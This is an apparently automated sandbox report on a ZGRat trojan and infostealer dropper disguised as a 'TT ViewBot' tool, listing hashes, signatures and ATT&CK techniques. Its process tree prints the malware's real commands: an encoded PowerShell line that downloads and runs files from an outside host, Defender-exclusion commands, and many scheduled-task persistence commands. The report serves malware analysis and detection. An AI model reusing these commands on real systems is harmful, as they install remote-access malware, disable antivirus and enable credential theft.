zgrat | 0aa3a8f7bd8f94484b0435e72e292744161b0707186f94845b7b6b54ac8f874d

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
07-05-2024 04:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

TT ViewBot v2.0/bot_start.exe
Size

2.5MB
MD5

bf4a8b1ff2f896acac3e7ace357abfca
SHA1

c1bd1b3d2959d844f6b4e339f45d3749667df3e1
SHA256

e0d1d7c74b52bbd40f5dc85cb9b3ab69ae750d8fc3f5fbd15a98eed616c1ce8e
SHA512

fd7082a905540e23a5c5b6fd2717c0255ede2680bef16076f174d417bbeef4694e2fa82a8f9e0407cc160344cc194edd19ab40901b468c1695a1b8773e23e494
SSDEEP

49152:Tfx0DZfVUfCnJA3bxBLbsgyGKEQYdfT3kVYCNN5oUpwmJFkjQuQLLOet:l4ZnIlBvyGKJA3kVD4lIl7r

Score

10^/10

zgrat execution rat spyware stealer

Malware Config

Signatures

Detect ZGRat V1 3 IoCs

resource	yara_rule
behavioral18/files/0x0007000000023447-55.dat	family_zgrat_v1
behavioral18/files/0x000b0000000233d6-73.dat	family_zgrat_v1
behavioral18/memory/3524-75-0x0000000000E00000-0x0000000001006000-memory.dmp	family_zgrat_v1

Process spawned unexpected child process 15 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1108	1412	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1956	1412	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4472	1412	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	424	1412	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2840	1412	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4952	1412	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3996	1412	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3104	1412	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5068	1412	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2016	1412	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4520	1412	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4892	1412	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4276	1412	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3620	1412	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2296	1412	schtasks.exe	90

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
26	4464	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3628	powershell.exe
4464	powershell.exe
4852	powershell.exe
3840	powershell.exe
1968	powershell.exe
4464	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	tthyperRuntimedhcpSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	tthyperRuntimedhcpSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	bot_start.exe

Executes dropped EXE 3 IoCs

pid	Process
2968	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
5024	cmd.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
1388	bot_start.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Windows Media Player\es-ES\sihost.exe	tthyperRuntimedhcpSvc.exe
File created	C:\Program Files (x86)\Windows Media Player\es-ES\66fc9ff0ee96c2	tthyperRuntimedhcpSvc.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\Telephony\RuntimeBroker.exe	tthyperRuntimedhcpSvc.exe
File created	C:\Windows\Logs\Telephony\9e8d7a4ca61bd9	tthyperRuntimedhcpSvc.exe
File created	C:\Windows\Logs\Telephony\RuntimeBroker.exe	tthyperRuntimedhcpSvc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 15 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
424	schtasks.exe
4952	schtasks.exe
2016	schtasks.exe
4520	schtasks.exe
4892	schtasks.exe
4276	schtasks.exe
3620	schtasks.exe
1956	schtasks.exe
3104	schtasks.exe
5068	schtasks.exe
1108	schtasks.exe
4472	schtasks.exe
2840	schtasks.exe
3996	schtasks.exe
2296	schtasks.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	tthyperRuntimedhcpSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	tthyperRuntimedhcpSvc.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3936	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4464	powershell.exe
4464	powershell.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe
3524	tthyperRuntimedhcpSvc.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5024	cmd.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	4464	powershell.exe
Token: SeDebugPrivilege	3524	tthyperRuntimedhcpSvc.exe
Token: SeDebugPrivilege	3840	powershell.exe
Token: SeDebugPrivilege	4852	powershell.exe
Token: SeDebugPrivilege	4464	powershell.exe
Token: SeDebugPrivilege	1968	powershell.exe
Token: SeDebugPrivilege	3628	powershell.exe
Token: SeDebugPrivilege	5024	cmd.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1388	bot_start.exe
3600	OpenWith.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 1388 wrote to memory of 4464	1388	bot_start.exe	83
PID 1388 wrote to memory of 4464	1388	bot_start.exe	83
PID 1388 wrote to memory of 4464	1388	bot_start.exe	83
PID 4464 wrote to memory of 2968	4464	powershell.exe	93
PID 4464 wrote to memory of 2968	4464	powershell.exe	93
PID 4464 wrote to memory of 2968	4464	powershell.exe	93
PID 2968 wrote to memory of 1416	2968	tthyperRuntimedhcpSvc.exe	95
PID 2968 wrote to memory of 1416	2968	tthyperRuntimedhcpSvc.exe	95
PID 2968 wrote to memory of 1416	2968	tthyperRuntimedhcpSvc.exe	95
PID 1416 wrote to memory of 2488	1416	WScript.exe	100
PID 1416 wrote to memory of 2488	1416	WScript.exe	100
PID 1416 wrote to memory of 2488	1416	WScript.exe	100
PID 2488 wrote to memory of 3524	2488	cmd.exe	102
PID 2488 wrote to memory of 3524	2488	cmd.exe	102
PID 3524 wrote to memory of 3628	3524	tthyperRuntimedhcpSvc.exe	118
PID 3524 wrote to memory of 3628	3524	tthyperRuntimedhcpSvc.exe	118
PID 3524 wrote to memory of 4464	3524	tthyperRuntimedhcpSvc.exe	119
PID 3524 wrote to memory of 4464	3524	tthyperRuntimedhcpSvc.exe	119
PID 3524 wrote to memory of 4852	3524	tthyperRuntimedhcpSvc.exe	120
PID 3524 wrote to memory of 4852	3524	tthyperRuntimedhcpSvc.exe	120
PID 3524 wrote to memory of 3840	3524	tthyperRuntimedhcpSvc.exe	121
PID 3524 wrote to memory of 3840	3524	tthyperRuntimedhcpSvc.exe	121
PID 3524 wrote to memory of 1968	3524	tthyperRuntimedhcpSvc.exe	122
PID 3524 wrote to memory of 1968	3524	tthyperRuntimedhcpSvc.exe	122
PID 3524 wrote to memory of 4768	3524	tthyperRuntimedhcpSvc.exe	128
PID 3524 wrote to memory of 4768	3524	tthyperRuntimedhcpSvc.exe	128
PID 4768 wrote to memory of 980	4768	cmd.exe	130
PID 4768 wrote to memory of 980	4768	cmd.exe	130
PID 4768 wrote to memory of 3936	4768	cmd.exe	131
PID 4768 wrote to memory of 3936	4768	cmd.exe	131
PID 4768 wrote to memory of 5024	4768	cmd.exe	132
PID 4768 wrote to memory of 5024	4768	cmd.exe	132

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\TT ViewBot v2.0\bot_start.exe
"C:\Users\Admin\AppData\Local\Temp\TT ViewBot v2.0\bot_start.exe"
1⤵
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1388
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAeQBkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcQBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbgBuAHQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAawBqAHYAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwByAGUAbQBvAHQAZQAvAHQAdABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwAsACAAPAAjAGoAdABpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAegB2AGgAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcABtAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAdAB0AGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAKQA8ACMAZAB1AGEAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAGMAbAAvAG0AYQBpAG4ALgBwAHkAJwAsACAAPAAjAHgAaAB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYwB1AGUAIwA+ACAALQBQAGEAdABoACAAKAAkAHAAdwBkACkALgBwAGEAdABoACAAPAAjAHUAaQBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG0AYQBpAG4ALgBwAHkAJwApACkAPAAjAGEAYQBqACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGUAawBpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBjAGEAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB0AHQAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcAKQA8ACMAZQB0AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcAB4AGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACgAJABwAHcAZAApAC4AcABhAHQAaAAgADwAIwB4AHYAeAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBtAGEAaQBuAC4AcAB5ACcAKQA8ACMAYwB1AGwAIwA+AA=="
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4464
- - C:\Users\Admin\AppData\Roaming\tthyperRuntimedhcpSvc.exe
    "C:\Users\Admin\AppData\Roaming\tthyperRuntimedhcpSvc.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:2968
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ChainReview\vN2WLFOsikyY5Jq7XrHIwXoKGZgWET9I.vbe"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:1416
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ChainReview\36Xky7wXbnjE3BIjQdUmzIM.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2488
      - C:\ChainReview\tthyperRuntimedhcpSvc.exe
        
        "C:\ChainReview/tthyperRuntimedhcpSvc.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3524
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Logs\Telephony\RuntimeBroker.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3628
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Videos\cmd.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4464
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Media Player\es-ES\sihost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\dllhost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\unsecapp.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1968
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\HY63mn26BU.bat"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4768
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:980
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        Runs ping.exe
        
        PID:3936
        
        C:\Users\Admin\Videos\cmd.exe
        
        "C:\Users\Admin\Videos\cmd.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:5024

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3600

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Windows\Logs\Telephony\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1108

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\Logs\Telephony\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1956

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Windows\Logs\Telephony\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4472

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Videos\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:424

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\Admin\Videos\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2840

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\Videos\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4952

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Media Player\es-ES\sihost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3996

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\es-ES\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3104

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Media Player\es-ES\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5068

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2016

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\All Users\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4520

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4892

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\unsecapp.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3620

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4276

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\unsecapp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2296

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ChainReview\36Xky7wXbnjE3BIjQdUmzIM.bat

Filesize
91B

MD5
6c4e82d40f84cbc9a6fec4a5a981a42d

SHA1
b9b43a7e2f9f4ad4767974bf4304a9e2a044fca3

SHA256
78d5a5d4618dce787ecc963e5f499af55e8c733b28842311f59d4f385ec42d5b

SHA512
262c93cb040935bd1f3b7ef8140e6ac322a9601ebb0004b5da24edea0b268db6b178f1d3c5d62c6e95b717603a3d29a00c56f90c8c3479b98335617e42700842

Download Submit
C:\ChainReview\tthyperRuntimedhcpSvc.exe

Filesize
2.0MB

MD5
4518369532566e624ed62d5715fc072c

SHA1
c8a4e4d75a1d3ef9e772b7264d61a4a65c37db33

SHA256
ad29e830bbc1cb324af918e800caed762d0d2e5a76cdca70cd3926d06add78f0

SHA512
d08d1124262cb10862562cccb7c4c1af0a9cc1c0f298fa8a596d528fb8b8be4804217c648de327f57c360267ab756db35b067f3961d1efd50b409a04a1505ae0

Download Submit
C:\ChainReview\vN2WLFOsikyY5Jq7XrHIwXoKGZgWET9I.vbe

Filesize
212B

MD5
43e82435c4abdf7a34d3f8ac5c575deb

SHA1
6d41a829dc856e7d911e8a95e8a4c7463cf18043

SHA256
1a8093c1223cfab24ebb1185ee1e5ac65909caf9ee9d5d6dc600c82a5d040acf

SHA512
e05cd9e7d232e452cc337335603864368ec042a7f6e322a4d76eb62ada78fca956a17a93d97c86b859e2114f8b2d6d2a0cb60190b8dad6797a62c31d92e6037f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
6ed1ca43698bf22b1e271edc9e3d205a

SHA1
623deddb7124871cfa8d050cd7cc4874c024c560

SHA256
ebab290a9795a813c9424e0e931d4b685dc3686749fa456ca5bc99659ec940fc

SHA512
57bee7e72ac2e845d28496c01533f82dde7e0a4e7f167edfb405545f5e4d88ae1d00dbf97a6877615e3dbd43b44afc4f443ea4a72a1a8b962bd990ccdc4b3a70

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
a7ce8cefc3f798abe5abd683d0ef26dd

SHA1
b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e

SHA256
5e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a

SHA512
c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64

Download Submit
C:\Users\Admin\AppData\Local\Temp\HY63mn26BU.bat

Filesize
157B

MD5
8446771aa1c1a851bcad5efd6c26a39e

SHA1
0b761f291650d8ff2ffce6d3e5fbddfff4f2366d

SHA256
3dbd0d738dedc627793ba7698a183a7b9d605c9760ad272f67ff80c037a384a4

SHA512
b97a8a29bdd92afb6fd3fd9fba50da5c532da744d95e01a015ecaceac38d31fc6a9423b62d1fe5d417ce846eac29df0ba01ad0729361804ba8f6dd2a7ddfba78

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dbafxzlh.a13.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\tthyperRuntimedhcpSvc.exe

Filesize
2.3MB

MD5
ce2e801c8d8413da9fe8f98723aab971

SHA1
784e4689c62131f43e4c9cd5883f433b88cf08d6

SHA256
79af1d0cd368f54b46320eceb7d9931049daf12207ff5e2226f10d9f8e068ca2

SHA512
951e938d6e52a6c2918bb0ad86b85cbc107092b6add73fda1ad6b312d3cc47864809370341b513aacbb4ea77002cb1822e7b8c1ab4429e56f2d32b7b16a4e664

Download Submit
memory/1388-3-0x000000007FA70000-0x000000007FE41000-memory.dmp

Filesize
3.8MB

Download
memory/1388-0-0x0000000000400000-0x0000000000E07000-memory.dmp

Filesize
10.0MB

Download
memory/1388-2-0x0000000000400000-0x0000000000E07000-memory.dmp

Filesize
10.0MB

Download
memory/1388-1-0x000000007FA70000-0x000000007FE41000-memory.dmp

Filesize
3.8MB

Download
memory/3524-88-0x00000000019C0000-0x00000000019CC000-memory.dmp

Filesize
48KB

Download
memory/3524-86-0x0000000001940000-0x000000000194E000-memory.dmp

Filesize
56KB

Download
memory/3524-84-0x0000000001930000-0x000000000193E000-memory.dmp

Filesize
56KB

Download
memory/3524-82-0x0000000003280000-0x0000000003298000-memory.dmp

Filesize
96KB

Download
